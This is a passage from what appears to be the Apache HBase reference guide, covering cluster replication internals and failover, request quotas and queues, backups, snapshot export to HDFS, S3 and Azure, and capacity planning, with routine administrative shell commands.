for the WAL that is currently being replicated is registered in ZooKeeper.\n\n. The first three steps, where the edit is inserted, are identical.\n. Again in a separate thread, the region server reads, filters, and edits the log edits in the same way as above.\n The slave region server does not answer the RPC call.\n. The master sleeps and tries again a configurable number of times.\n. If the slave region server is still not available, the master selects a new subset of region server to replicate to, and tries again to send the buffer of edits.\n. Meanwhile, the WALs are rolled and stored in a queue in ZooKeeper.\n Logs that are [firstterm]_archived_ by their region server, by moving them from the region server's log directory to a central log directory, will update their paths in the in-memory queue of the replicating thread.\n. When the slave cluster is finally available, the buffer is applied in the same way as during normal processing.\n The master region server will then replicate the backlog of logs that accumulated during the outage.\n\n.Spreading Queue Failover Load\nWhen replication is active, a subset of region servers in the source cluster is responsible for shipping edits to the sink.\nThis responsibility must be failed over like all other region server functions should a process or node crash.\nThe following configuration settings are recommended for maintaining an even distribution of replication activity over the remaining live servers in the source cluster:\n\n* Set `replication.source.maxretriesmultiplier` to `300`.\n* Set `replication.source.sleepforretries` to `1` (1 second). This value, combined with the value of `replication.source.maxretriesmultiplier`, causes the retry cycle to last about 5 minutes.\n* Set `replication.sleep.before.failover` to `30000` (30 seconds) in the source cluster site configuration.\n\n[[cluster.replication.preserving.tags]]\n.Preserving Tags During Replication\nBy default, the codec used for replication between clusters strips tags, such as cell-level ACLs, from cells.\nTo prevent the tags from being stripped, you can use a different codec which does not strip them.\nConfigure `hbase.replication.rpc.codec` to use `org.apache.hadoop.hbase.codec.KeyValueCodecWithTags`, on both the source and sink RegionServers involved in the replication.\nThis option was introduced in link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-10322[HBASE-10322].\n\n==== Replication Internals\n\nReplication State in ZooKeeper::\n HBase replication maintains its state in ZooKeeper.\n By default, the state is contained in the base node _\/hbase\/replication_.\n This node contains two child nodes, the `Peers` znode and the `RS` znode.\n\nThe `Peers` Znode::\n The `peers` znode is stored in _\/hbase\/replication\/peers_ by default.\n It consists of a list of all peer replication clusters, along with the status of each of them.\n The value of each peer is its cluster key, which is provided in the HBase Shell.\n The cluster key contains a list of ZooKeeper nodes in the cluster's quorum, the client port for the ZooKeeper quorum, and the base znode for HBase in HDFS on that cluster.\n\nThe `RS` Znode::\n The `rs` znode contains a list of WAL logs which need to be replicated.\n This list is divided into a set of queues organized by region server and the peer cluster the region server is shipping the logs to.\n The rs znode has one child znode for each region server in the cluster.\n The child znode name is the region server's hostname, client port, and start code.\n This list includes both live and dead region servers.\n\n==== Choosing Region Servers to Replicate To\n\nWhen a master cluster region server initiates a replication source to a slave cluster, it first connects to the slave's ZooKeeper ensemble using the provided cluster key . It then scans the _rs\/_ directory to discover all the available sinks (region servers that are accepting incoming streams of edits to replicate) and randomly chooses a subset of them using a configured ratio which has a default value of 10%. For example, if a slave cluster has 150 machines, 15 will be chosen as potential recipient for edits that this master cluster region server sends.\nBecause this selection is performed by each master region server, the probability that all slave region servers are used is very high, and this method works for clusters of any size.\nFor example, a master cluster of 10 machines replicating to a slave cluster of 5 machines with a ratio of 10% causes the master cluster region servers to choose one machine each at random.\n\nA ZooKeeper watcher is placed on the _${zookeeper.znode.parent}\/rs_ node of the slave cluster by each of the master cluster's region servers.\nThis watch is used to monitor changes in the composition of the slave cluster.\nWhen nodes are removed from the slave cluster, or if nodes go down or come back up, the master cluster's region servers will respond by selecting a new pool of slave region servers to replicate to.\n\n==== Keeping Track of Logs\n\nEach master cluster region server has its own znode in the replication znodes hierarchy.\nIt contains one znode per peer cluster (if 5 slave clusters, 5 znodes are created), and each of these contain a queue of WALs to process.\nEach of these queues will track the WALs created by that region server, but they can differ in size.\nFor example, if one slave cluster becomes unavailable for some time, the WALs should not be deleted, so they need to stay in the queue while the others are processed.\nSee <<rs.failover.details,rs.failover.details>> for an example.\n\nWhen a source is instantiated, it contains the current WAL that the region server is writing to.\nDuring log rolling, the new file is added to the queue of each slave cluster's znode just before it is made available.\nThis ensures that all the sources are aware that a new log exists before the region server is able to append edits into it, but this operations is now more expensive.\nThe queue items are discarded when the replication thread cannot read more entries from a file (because it reached the end of the last block) and there are other files in the queue.\nThis means that if a source is up to date and replicates from the log that the region server writes to, reading up to the \"end\" of the current file will not delete the item in the queue.\n\nA log can be archived if it is no longer used or if the number of logs exceeds `hbase.regionserver.maxlogs` because the insertion rate is faster than regions are flushed.\nWhen a log is archived, the source threads are notified that the path for that log changed.\nIf a particular source has already finished with an archived log, it will just ignore the message.\nIf the log is in the queue, the path will be updated in memory.\nIf the log is currently being replicated, the change will be done atomically so that the reader doesn't attempt to open the file when has already been moved.\nBecause moving a file is a NameNode operation , if the reader is currently reading the log, it won't generate any exception.\n\n==== Reading, Filtering and Sending Edits\n\nBy default, a source attempts to read from a WAL and ship log entries to a sink as quickly as possible.\nSpeed is limited by the filtering of log entries Only KeyValues that are scoped GLOBAL and that do not belong to catalog tables will be retained.\nSpeed is also limited by total size of the list of edits to replicate per slave, which is limited to 64 MB by default.\nWith this configuration, a master cluster region server with three slaves would use at most 192 MB to store data to replicate.\nThis does not account for the data which was filtered but not garbage collected.\n\nOnce the maximum size of edits has been buffered or the reader reaches the end of the WAL, the source thread stops reading and chooses at random a sink to replicate to (from the list that was generated by keeping only a subset of slave region servers). It directly issues a RPC to the chosen region server and waits for the method to return.\nIf the RPC was successful, the source determines whether the current file has been emptied or it contains more data which needs to be read.\nIf the file has been emptied, the source deletes the znode in the queue.\nOtherwise, it registers the new offset in the log's znode.\nIf the RPC threw an exception, the source will retry 10 times before trying to find a different sink.\n\n==== Cleaning Logs\n\nIf replication is not enabled, the master's log-cleaning thread deletes old logs using a configured TTL.\nThis TTL-based method does not work well with replication, because archived logs which have exceeded their TTL may still be in a queue.\nThe default behavior is augmented so that if a log is past its TTL, the cleaning thread looks up every queue until it finds the log, while caching queues it has found.\nIf the log is not found in any queues, the log will be deleted.\nThe next time the cleaning process needs to look for a log, it starts by using its cached list.\n\nNOTE: WALs are saved when replication is enabled or disabled as long as peers exist.\n\n[[rs.failover.details]]\n==== Region Server Failover\n\nWhen no region servers are failing, keeping track of the logs in ZooKeeper adds no value.\nUnfortunately, region servers do fail, and since ZooKeeper is highly available, it is useful for managing the transfer of the queues in the event of a failure.\n\nEach of the master cluster region servers keeps a watcher on every other region server, in order to be notified when one dies (just as the master does). When a failure happens, they all race to create a znode called `lock` inside the dead region server's znode that contains its queues.\nThe region server that creates it successfully then transfers all the queues to its own znode, one at a time since ZooKeeper does not support renaming queues.\nAfter queues are all transferred, they are deleted from the old location.\nThe znodes that were recovered are renamed with the ID of the slave cluster appended with the name of the dead server.\n\nNext, the master cluster region server creates one new source thread per copied queue, and each of the source threads follows the read\/filter\/ship pattern.\nThe main difference is that those queues will never receive new data, since they do not belong to their new region server.\nWhen the reader hits the end of the last log, the queue's znode is deleted and the master cluster region server closes that replication source.\n\nGiven a master cluster with 3 region servers replicating to a single slave with id `2`, the following hierarchy represents what the znodes layout could be at some point in time.\nThe region servers' znodes all contain a `peers` znode which contains a single queue.\nThe znode names in the queues represent the actual file names on HDFS in the form `address,port.timestamp`.\n\n----\n\n\/hbase\/replication\/rs\/\n 1.1.1.1,60020,123456780\/\n 2\/\n 1.1.1.1,60020.1234 (Contains a position)\n 1.1.1.1,60020.1265\n 1.1.1.2,60020,123456790\/\n 2\/\n 1.1.1.2,60020.1214 (Contains a position)\n 1.1.1.2,60020.1248\n 1.1.1.2,60020.1312\n 1.1.1.3,60020, 123456630\/\n 2\/\n 1.1.1.3,60020.1280 (Contains a position)\n----\n\nAssume that 1.1.1.2 loses its ZooKeeper session.\nThe survivors will race to create a lock, and, arbitrarily, 1.1.1.3 wins.\nIt will then start transferring all the queues to its local peers znode by appending the name of the dead server.\nRight before 1.1.1.3 is able to clean up the old znodes, the layout will look like the following:\n\n----\n\n\/hbase\/replication\/rs\/\n 1.1.1.1,60020,123456780\/\n 2\/\n 1.1.1.1,60020.1234 (Contains a position)\n 1.1.1.1,60020.1265\n 1.1.1.2,60020,123456790\/\n lock\n 2\/\n 1.1.1.2,60020.1214 (Contains a position)\n 1.1.1.2,60020.1248\n 1.1.1.2,60020.1312\n 1.1.1.3,60020,123456630\/\n 2\/\n 1.1.1.3,60020.1280 (Contains a position)\n\n 2-1.1.1.2,60020,123456790\/\n 1.1.1.2,60020.1214 (Contains a position)\n 1.1.1.2,60020.1248\n 1.1.1.2,60020.1312\n----\n\nSome time later, but before 1.1.1.3 is able to finish replicating the last WAL from 1.1.1.2, it dies too.\nSome new logs were also created in the normal queues.\nThe last region server will then try to lock 1.1.1.3's znode and will begin transferring all the queues.\nThe new layout will be:\n\n----\n\n\/hbase\/replication\/rs\/\n 1.1.1.1,60020,123456780\/\n 2\/\n 1.1.1.1,60020.1378 (Contains a position)\n\n 2-1.1.1.3,60020,123456630\/\n 1.1.1.3,60020.1325 (Contains a position)\n 1.1.1.3,60020.1401\n\n 2-1.1.1.2,60020,123456790-1.1.1.3,60020,123456630\/\n 1.1.1.2,60020.1312 (Contains a position)\n 1.1.1.3,60020,123456630\/\n lock\n 2\/\n 1.1.1.3,60020.1325 (Contains a position)\n 1.1.1.3,60020.1401\n\n 2-1.1.1.2,60020,123456790\/\n 1.1.1.2,60020.1312 (Contains a position)\n----\n\n=== Replication Metrics\n\nThe following metrics are exposed at the global region server level and (since HBase 0.95) at the peer level:\n\n`source.sizeOfLogQueue`::\n number of WALs to process (excludes the one which is being processed) at the Replication source\n\n`source.shippedOps`::\n number of mutations shipped\n\n`source.logEditsRead`::\n number of mutations read from WALs at the replication source\n\n`source.ageOfLastShippedOp`::\n age of last batch that was shipped by the replication source\n\n=== Replication Configuration Options\n\n[cols=\"1,1,1\", options=\"header\"]\n|===\n| Option\n| Description\n| Default\n\n| zookeeper.znode.parent\n| The name of the base ZooKeeper znode used for HBase\n| \/hbase\n\n| zookeeper.znode.replication\n| The name of the base znode used for replication\n| replication\n\n| zookeeper.znode.replication.peers\n| The name of the peer znode\n| peers\n\n| zookeeper.znode.replication.peers.state\n| The name of peer-state znode\n| peer-state\n\n| zookeeper.znode.replication.rs\n| The name of the rs znode\n| rs\n\n| replication.sleep.before.failover\n| How many milliseconds a worker should sleep before attempting to replicate\n a dead region server's WAL queues.\n|\n\n| replication.executor.workers\n| The number of region servers a given region server should attempt to\n failover simultaneously.\n| 1\n|===\n\n=== Monitoring Replication Status\n\nYou can use the HBase Shell command `status 'replication'` to monitor the replication status on your cluster. The command has three variations:\n* `status 'replication'` -- prints the status of each source and its sinks, sorted by hostname.\n* `status 'replication', 'source'` -- prints the status for each replication source, sorted by hostname.\n* `status 'replication', 'sink'` -- prints the status for each replication sink, sorted by hostname.\n\n== Running Multiple Workloads On a Single Cluster\n\nHBase provides the following mechanisms for managing the performance of a cluster\nhandling multiple workloads:\n. <<quota>>\n. <<request_queues>>\n. <<multiple-typed-queues>>\n\n[[quota]]\n=== Quotas\nHBASE-11598 introduces quotas, which allow you to throttle requests based on\nthe following limits:\n\n. <<request-quotas,The number or size of requests(read, write, or read+write) in a given timeframe>>\n. <<namespace_quotas,The number of tables allowed in a namespace>>\n\nThese limits can be enforced for a specified user, table, or namespace.\n\n.Enabling Quotas\n\nQuotas are disabled by default. To enable the feature, set the `hbase.quota.enabled`\nproperty to `true` in _hbase-site.xml_ file for all cluster nodes.\n\n.General Quota Syntax\n. THROTTLE_TYPE can be expressed as READ, WRITE, or the default type(read + write).\n. Timeframes can be expressed in the following units: `sec`, `min`, `hour`, `day`\n. Request sizes can be expressed in the following units: `B` (bytes), `K` (kilobytes),\n`M` (megabytes), `G` (gigabytes), `T` (terabytes), `P` (petabytes)\n. Numbers of requests are expressed as an integer followed by the string `req`\n. Limits relating to time are expressed as req\/time or size\/time. For instance `10req\/day`\nor `100P\/hour`.\n. Numbers of tables or regions are expressed as integers.\n\n[[request-quotas]]\n.Setting Request Quotas\nYou can set quota rules ahead of time, or you can change the throttle at runtime. The change\nwill propagate after the quota refresh period has expired. This expiration period\ndefaults to 5 minutes. To change it, modify the `hbase.quota.refresh.period` property\nin `hbase-site.xml`. This property is expressed in milliseconds and defaults to `300000`.\n\n----\n# Limit user u1 to 10 requests per second\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', LIMIT => '10req\/sec'\n\n# Limit user u1 to 10 read requests per second\nhbase> set_quota TYPE => THROTTLE, THROTTLE_TYPE => READ, USER => 'u1', LIMIT => '10req\/sec'\n\n# Limit user u1 to 10 M per day everywhere\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', LIMIT => '10M\/day'\n\n# Limit user u1 to 10 M write size per sec\nhbase> set_quota TYPE => THROTTLE, THROTTLE_TYPE => WRITE, USER => 'u1', LIMIT => '10M\/sec'\n\n# Limit user u1 to 5k per minute on table t2\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', TABLE => 't2', LIMIT => '5K\/min'\n\n# Limit user u1 to 10 read requests per sec on table t2\nhbase> set_quota TYPE => THROTTLE, THROTTLE_TYPE => READ, USER => 'u1', TABLE => 't2', LIMIT => '10req\/sec'\n\n# Remove an existing limit from user u1 on namespace ns2\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', NAMESPACE => 'ns2', LIMIT => NONE\n\n# Limit all users to 10 requests per hour on namespace ns1\nhbase> set_quota TYPE => THROTTLE, NAMESPACE => 'ns1', LIMIT => '10req\/hour'\n\n# Limit all users to 10 T per hour on table t1\nhbase> set_quota TYPE => THROTTLE, TABLE => 't1', LIMIT => '10T\/hour'\n\n# Remove all existing limits from user u1\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', LIMIT => NONE\n\n# List all quotas for user u1 in namespace ns2\nhbase> list_quotas USER => 'u1, NAMESPACE => 'ns2'\n\n# List all quotas for namespace ns2\nhbase> list_quotas NAMESPACE => 'ns2'\n\n# List all quotas for table t1\nhbase> list_quotas TABLE => 't1'\n\n# list all quotas\nhbase> list_quotas\n----\n\nYou can also place a global limit and exclude a user or a table from the limit by applying the\n`GLOBAL_BYPASS` property.\n----\nhbase> set_quota NAMESPACE => 'ns1', LIMIT => '100req\/min' # a per-namespace request limit\nhbase> set_quota USER => 'u1', GLOBAL_BYPASS => true # user u1 is not affected by the limit\n----\n\n[[namespace_quotas]]\n.Setting Namespace Quotas\n\nYou can specify the maximum number of tables or regions allowed in a given namespace, either\nwhen you create the namespace or by altering an existing namespace, by setting the\n`hbase.namespace.quota.maxtables property` on the namespace.\n\n.Limiting Tables Per Namespace\n----\n# Create a namespace with a max of 5 tables\nhbase> create_namespace 'ns1', {'hbase.namespace.quota.maxtables'=>'5'}\n\n# Alter an existing namespace to have a max of 8 tables\nhbase> alter_namespace 'ns2', {METHOD => 'set', 'hbase.namespace.quota.maxtables'=>'8'}\n\n# Show quota information for a namespace\nhbase> describe_namespace 'ns2'\n\n# Alter an existing namespace to remove a quota\nhbase> alter_namespace 'ns2', {METHOD => 'unset', NAME=>'hbase.namespace.quota.maxtables'}\n----\n\n.Limiting Regions Per Namespace\n----\n# Create a namespace with a max of 10 regions\nhbase> create_namespace 'ns1', {'hbase.namespace.quota.maxregions'=>'10'\n\n# Show quota information for a namespace\nhbase> describe_namespace 'ns1'\n\n# Alter an existing namespace to have a max of 20 tables\nhbase> alter_namespace 'ns2', {METHOD => 'set', 'hbase.namespace.quota.maxregions'=>'20'}\n\n# Alter an existing namespace to remove a quota\nhbase> alter_namespace 'ns2', {METHOD => 'unset', NAME=> 'hbase.namespace.quota.maxregions'}\n----\n\n[[request_queues]]\n=== Request Queues\nIf no throttling policy is configured, when the RegionServer receives multiple requests,\nthey are now placed into a queue waiting for a free execution slot (HBASE-6721).\nThe simplest queue is a FIFO queue, where each request waits for all previous requests in the queue\nto finish before running. Fast or interactive queries can get stuck behind large requests.\n\nIf you are able to guess how long a request will take, you can reorder requests by\npushing the long requests to the end of the queue and allowing short requests to preempt\nthem. Eventually, you must still execute the large requests and prioritize the new\nrequests behind them. The short requests will be newer, so the result is not terrible,\nbut still suboptimal compared to a mechanism which allows large requests to be split\ninto multiple smaller ones.\n\nHBASE-10993 introduces such a system for deprioritizing long-running scanners. There\nare two types of queues, `fifo` and `deadline`. To configure the type of queue used,\nconfigure the `hbase.ipc.server.callqueue.type` property in `hbase-site.xml`. There\nis no way to estimate how long each request may take, so de-prioritization only affects\nscans, and is based on the number of \u201cnext\u201d calls a scan request has made. An assumption\nis made that when you are doing a full table scan, your job is not likely to be interactive,\nso if there are concurrent requests, you can delay long-running scans up to a limit tunable by\nsetting the `hbase.ipc.server.queue.max.call.delay` property. The slope of the delay is calculated\nby a simple square root of `(numNextCall * weight)` where the weight is\nconfigurable by setting the `hbase.ipc.server.scan.vtime.weight` property.\n\n[[multiple-typed-queues]]\n=== Multiple-Typed Queues\n\nYou can also prioritize or deprioritize different kinds of requests by configuring\na specified number of dedicated handlers and queues. You can segregate the scan requests\nin a single queue with a single handler, and all the other available queues can service\nshort `Get` requests.\n\nYou can adjust the IPC queues and handlers based on the type of workload, using static\ntuning options. This approach is an interim first step that will eventually allow\nyou to change the settings at runtime, and to dynamically adjust values based on the load.\n\n.Multiple Queues\n\nTo avoid contention and separate different kinds of requests, configure the\n`hbase.ipc.server.callqueue.handler.factor` property, which allows you to increase the number of\nqueues and control how many handlers can share the same queue., allows admins to increase the number\nof queues and decide how many handlers share the same queue.\n\nUsing more queues reduces contention when adding a task to a queue or selecting it\nfrom a queue. You can even configure one queue per handler. The trade-off is that\nif some queues contain long-running tasks, a handler may need to wait to execute from that queue\nrather than stealing from another queue which has waiting tasks.\n\n.Read and Write Queues\nWith multiple queues, you can now divide read and write requests, giving more priority\n(more queues) to one or the other type. Use the `hbase.ipc.server.callqueue.read.ratio`\nproperty to choose to serve more reads or more writes.\n\n.Get and Scan Queues\nSimilar to the read\/write split, you can split gets and scans by tuning the `hbase.ipc.server.callqueue.scan.ratio`\nproperty to give more priority to gets or to scans. A scan ratio of `0.1` will give\nmore queue\/handlers to the incoming gets, which means that more gets can be processed\nat the same time and that fewer scans can be executed at the same time. A value of\n`0.9` will give more queue\/handlers to scans, so the number of scans executed will\nincrease and the number of gets will decrease.\n\n\n[[ops.backup]]\n== HBase Backup\n\nThere are two broad strategies for performing HBase backups: backing up with a full cluster shutdown, and backing up on a live cluster.\nEach approach has pros and cons.\n\nFor additional information, see link:http:\/\/blog.sematext.com\/2011\/03\/11\/hbase-backup-options\/[HBase Backup\n Options] over on the Sematext Blog.\n\n[[ops.backup.fullshutdown]]\n=== Full Shutdown Backup\n\nSome environments can tolerate a periodic full shutdown of their HBase cluster, for example if it is being used a back-end analytic capacity and not serving front-end web-pages.\nThe benefits are that the NameNode\/Master are RegionServers are down, so there is no chance of missing any in-flight changes to either StoreFiles or metadata.\nThe obvious con is that the cluster is down.\nThe steps include:\n\n[[ops.backup.fullshutdown.stop]]\n==== Stop HBase\n\n\n\n[[ops.backup.fullshutdown.distcp]]\n==== Distcp\n\nDistcp could be used to either copy the contents of the HBase directory in HDFS to either the same cluster in another directory, or to a different cluster.\n\nNote: Distcp works in this situation because the cluster is down and there are no in-flight edits to files.\nDistcp-ing of files in the HBase directory is not generally recommended on a live cluster.\n\n[[ops.backup.fullshutdown.restore]]\n==== Restore (if needed)\n\nThe backup of the hbase directory from HDFS is copied onto the 'real' hbase directory via distcp.\nThe act of copying these files creates new HDFS metadata, which is why a restore of the NameNode edits from the time of the HBase backup isn't required for this kind of restore, because it's a restore (via distcp) of a specific HDFS directory (i.e., the HBase part) not the entire HDFS file-system.\n\n[[ops.backup.live.replication]]\n=== Live Cluster Backup - Replication\n\nThis approach assumes that there is a second cluster.\nSee the HBase page on link:http:\/\/hbase.apache.org\/book.html#replication[replication] for more information.\n\n[[ops.backup.live.copytable]]\n=== Live Cluster Backup - CopyTable\n\nThe <<copy.table,copytable>> utility could either be used to copy data from one table to another on the same cluster, or to copy data to another table on another cluster.\n\nSince the cluster is up, there is a risk that edits could be missed in the copy process.\n\n[[ops.backup.live.export]]\n=== Live Cluster Backup - Export\n\nThe <<export,export>> approach dumps the content of a table to HDFS on the same cluster.\nTo restore the data, the <<import,import>> utility would be used.\n\nSince the cluster is up, there is a risk that edits could be missed in the export process.\n\n[[ops.snapshots]]\n== HBase Snapshots\n\nHBase Snapshots allow you to take a snapshot of a table without too much impact on Region Servers.\nSnapshot, Clone and restore operations don't involve data copying.\nAlso, Exporting the snapshot to another cluster doesn't have impact on the Region Servers.\n\nPrior to version 0.94.6, the only way to backup or to clone a table is to use CopyTable\/ExportTable, or to copy all the hfiles in HDFS after disabling the table.\nThe disadvantages of these methods are that you can degrade region server performance (Copy\/Export Table) or you need to disable the table, that means no reads or writes; and this is usually unacceptable.\n\n[[ops.snapshots.configuration]]\n=== Configuration\n\nTo turn on the snapshot support just set the `hbase.snapshot.enabled` property to true.\n(Snapshots are enabled by default in 0.95+ and off by default in 0.94.6+)\n\n[source,java]\n----\n\n <property>\n <name>hbase.snapshot.enabled<\/name>\n <value>true<\/value>\n <\/property>\n----\n\n[[ops.snapshots.takeasnapshot]]\n=== Take a Snapshot\n\nYou can take a snapshot of a table regardless of whether it is enabled or disabled.\nThe snapshot operation doesn't involve any data copying.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> snapshot 'myTable', 'myTableSnapshot-122112'\n----\n\n.Take a Snapshot Without Flushing\nThe default behavior is to perform a flush of data in memory before the snapshot is taken.\nThis means that data in memory is included in the snapshot.\nIn most cases, this is the desired behavior.\nHowever, if your set-up can tolerate data in memory being excluded from the snapshot, you can use the `SKIP_FLUSH` option of the `snapshot` command to disable and flushing while taking the snapshot.\n\n----\nhbase> snapshot 'mytable', 'snapshot123', {SKIP_FLUSH => true}\n----\n\nWARNING: There is no way to determine or predict whether a very concurrent insert or update will be included in a given snapshot, whether flushing is enabled or disabled.\nA snapshot is only a representation of a table during a window of time.\nThe amount of time the snapshot operation will take to reach each Region Server may vary from a few seconds to a minute, depending on the resource load and speed of the hardware or network, among other factors.\nThere is also no way to know whether a given insert or update is in memory or has been flushed.\n\n[[ops.snapshots.list]]\n=== Listing Snapshots\n\nList all snapshots taken (by printing the names and relative information).\n\n----\n\n$ .\/bin\/hbase shell\nhbase> list_snapshots\n----\n\n[[ops.snapshots.delete]]\n=== Deleting Snapshots\n\nYou can remove a snapshot, and the files retained for that snapshot will be removed if no longer needed.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> delete_snapshot 'myTableSnapshot-122112'\n----\n\n[[ops.snapshots.clone]]\n=== Clone a table from snapshot\n\nFrom a snapshot you can create a new table (clone operation) with the same data that you had when the snapshot was taken.\nThe clone operation, doesn't involve data copies, and a change to the cloned table doesn't impact the snapshot or the original table.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> clone_snapshot 'myTableSnapshot-122112', 'myNewTestTable'\n----\n\n[[ops.snapshots.restore]]\n=== Restore a snapshot\n\nThe restore operation requires the table to be disabled, and the table will be restored to the state at the time when the snapshot was taken, changing both data and schema if required.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> disable 'myTable'\nhbase> restore_snapshot 'myTableSnapshot-122112'\n----\n\nNOTE: Since Replication works at log level and snapshots at file-system level, after a restore, the replicas will be in a different state from the master.\nIf you want to use restore, you need to stop replication and redo the bootstrap.\n\nIn case of partial data-loss due to misbehaving client, instead of a full restore that requires the table to be disabled, you can clone the table from the snapshot and use a Map-Reduce job to copy the data that you need, from the clone to the main one.\n\n[[ops.snapshots.acls]]\n=== Snapshots operations and ACLs\n\nIf you are using security with the AccessController Coprocessor (See <<hbase.accesscontrol.configuration,hbase.accesscontrol.configuration>>), only a global administrator can take, clone, or restore a snapshot, and these actions do not capture the ACL rights.\nThis means that restoring a table preserves the ACL rights of the existing table, while cloning a table creates a new table that has no ACL rights until the administrator adds them.\n\n[[ops.snapshots.export]]\n=== Export to another cluster\n\nThe ExportSnapshot tool copies all the data related to a snapshot (hfiles, logs, snapshot metadata) to another cluster.\nThe tool executes a Map-Reduce job, similar to distcp, to copy files between the two clusters, and since it works at file-system level the hbase cluster does not have to be online.\n\nTo copy a snapshot called MySnapshot to an HBase cluster srv2 (hdfs:\/\/\/srv2:8082\/hbase) using 16 mappers:\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot -snapshot MySnapshot -copy-to hdfs:\/\/srv2:8082\/hbase -mappers 16\n----\n\n.Limiting Bandwidth Consumption\nYou can limit the bandwidth consumption when exporting a snapshot, by specifying the `-bandwidth` parameter, which expects an integer representing megabytes per second.\nThe following example limits the above example to 200 MB\/sec.\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot -snapshot MySnapshot -copy-to hdfs:\/\/srv2:8082\/hbase -mappers 16 -bandwidth 200\n----\n\n[[snapshots_s3]]\n=== Storing Snapshots in an Amazon S3 Bucket\n\nFor general information and limitations of using Amazon S3 storage with HBase, see\n<<amazon_s3_configuration>>. You can also store and retrieve snapshots from Amazon\nS3, using the following procedure.\n\nNOTE: You can also store snapshots in Microsoft Azure Blob Storage. See <<snapshots_azure>>.\n\n.Prerequisites\n- You must be using HBase 1.0 or higher and Hadoop 2.6.1 or higher, which is the first\nconfiguration that uses the Amazon AWS SDK.\n- You must use the `s3a:\/\/` protocol to connect to Amazon S3. The older `s3n:\/\/`\nand `s3:\/\/` protocols have various limitations and do not use the Amazon AWS SDK.\n- The `s3a:\/\/` URI must be configured and available on the server where you run\nthe commands to export and restore the snapshot.\n\nAfter you have fulfilled the prerequisites, take the snapshot like you normally would.\nAfterward, you can export it using the `org.apache.hadoop.hbase.snapshot.ExportSnapshot`\ncommand like the one below, substituting your own `s3a:\/\/` path in the `copy-from`\nor `copy-to` directive and substituting or modifying other options as required:\n\n----\n$ hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot \\\n -snapshot MySnapshot \\\n -copy-from hdfs:\/\/srv2:8082\/hbase \\\n -copy-to s3a:\/\/<bucket>\/<namespace>\/hbase \\\n -chuser MyUser \\\n -chgroup MyGroup \\\n -chmod 700 \\\n -mappers 16\n----\n\n----\n$ hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot \\\n -snapshot MySnapshot\n -copy-from s3a:\/\/<bucket>\/<namespace>\/hbase \\\n -copy-to hdfs:\/\/srv2:8082\/hbase \\\n -chuser MyUser \\\n -chgroup MyGroup \\\n -chmod 700 \\\n -mappers 16\n----\n\nYou can also use the `org.apache.hadoop.hbase.snapshot.SnapshotInfo` utility with the `s3a:\/\/` path by including the\n`-remote-dir` option.\n\n----\n$ hbase org.apache.hadoop.hbase.snapshot.SnapshotInfo \\\n -remote-dir s3a:\/\/<bucket>\/<namespace>\/hbase \\\n -list-snapshots\n----\n\n[[snapshots_azure]]\n== Storing Snapshots in Microsoft Azure Blob Storage\n\nYou can store snapshots in Microsoft Azure Blog Storage using the same techniques\nas in <<snapshots_s3>>.\n\n.Prerequisites\n- You must be using HBase 1.2 or higher with Hadoop 2.7.1 or\n higher. No version of HBase supports Hadoop 2.7.0.\n- Your hosts must be configured to be aware of the Azure blob storage filesystem.\n See http:\/\/hadoop.apache.org\/docs\/r2.7.1\/hadoop-azure\/index.html.\n\nAfter you meet the prerequisites, follow the instructions\nin <<snapshots_s3>>, replacingthe protocol specifier with `wasb:\/\/` or `wasbs:\/\/`.\n\n[[ops.capacity]]\n== Capacity Planning and Region Sizing\n\nThere are several considerations when planning the capacity for an HBase cluster and performing the initial configuration.\nStart with a solid understanding of how HBase handles data internally.\n\n[[ops.capacity.nodes]]\n=== Node count and hardware\/VM configuration\n\n[[ops.capacity.nodes.datasize]]\n==== Physical data size\n\nPhysical data size on disk is distinct from logical size of your data and is affected by the following:\n\n* Increased by HBase overhead\n+\n* See <<keyvalue,keyvalue>> and <<keysize,keysize>>.\n At least 24 bytes per key-value (cell), can be more.\n Small keys\/values means more relative overhead.\n* KeyValue instances are aggregated into blocks, which are indexed.\n Indexes also have to be stored.\n Blocksize is configurable on a per-ColumnFamily basis.\n See <<regions.arch,regions.arch>>.\n\n* Decreased by <<compression,compression>> and data block encoding, depending on data.\n See also link:http:\/\/search-hadoop.com\/m\/lL12B1PFVhp1[this thread].\n You might want to test what compression and encoding (if any) make sense for your data.\n* Increased by size of region server <<wal,wal>> (usually fixed and negligible - less than half of RS memory size, per RS).\n* Increased by HDFS replication - usually x3.\n\nAside from the disk space necessary to store the data, one RS may not be able to serve arbitrarily large amounts of data due to some practical limits on region count and size (see <<ops.capacity.regions,ops.capacity.regions>>).\n\n[[ops.capacity.nodes.throughput]]\n==== Read\/Write throughput\n\nNumber of nodes can also be driven by required throughput for reads and\/or writes.\nThe throughput one can get per node depends a lot on data (esp.\nkey\/value sizes) and request patterns, as well as node and system configuration.\nPlanning should be done for peak load if it is likely that the load would be the main driver of the increase of the node count.\nPerformanceEvaluation and <<ycsb,ycsb>> tools can be used to test single node or a test cluster.\n\nFor write, usually 5-15Mb\/s per RS can be expected, since every region server has only one active WAL.\nThere's no good estimate for reads, as it depends vastly on data, requests, and cache hit rate. <<perf.casestudy,perf.casestudy>> might be helpful.\n\n[[ops.capacity.nodes.gc]]\n==== JVM GC limitations\n\nRS cannot currently utilize very large heap due to cost of GC.\nThere's also no good way of running multiple RS-es per server (other than running several VMs per machine). Thus, ~20-24Gb or less memory dedicated to one RS is recommended.\nGC tuning is required for large heap sizes.\nSee <<gcpause,gcpause>>, <<trouble.log.gc,trouble.log.gc>> and elsewhere (TODO: where?)\n\n[[ops.capacity.regions]]\n=== Determining region count and size\n\nGenerally less regions makes for a smoother running cluster (you can always manually split the big regions later (if necessary) to spread the data, or request load, over the cluster); 20-200 regions per RS is a reasonable range.\nThe number of regions cannot be configured directly (unless you go for fully <<disable.splitting,disable.splitting>>); adjust the region size to achieve the target region size given table size.\n\nWhen configuring regions for 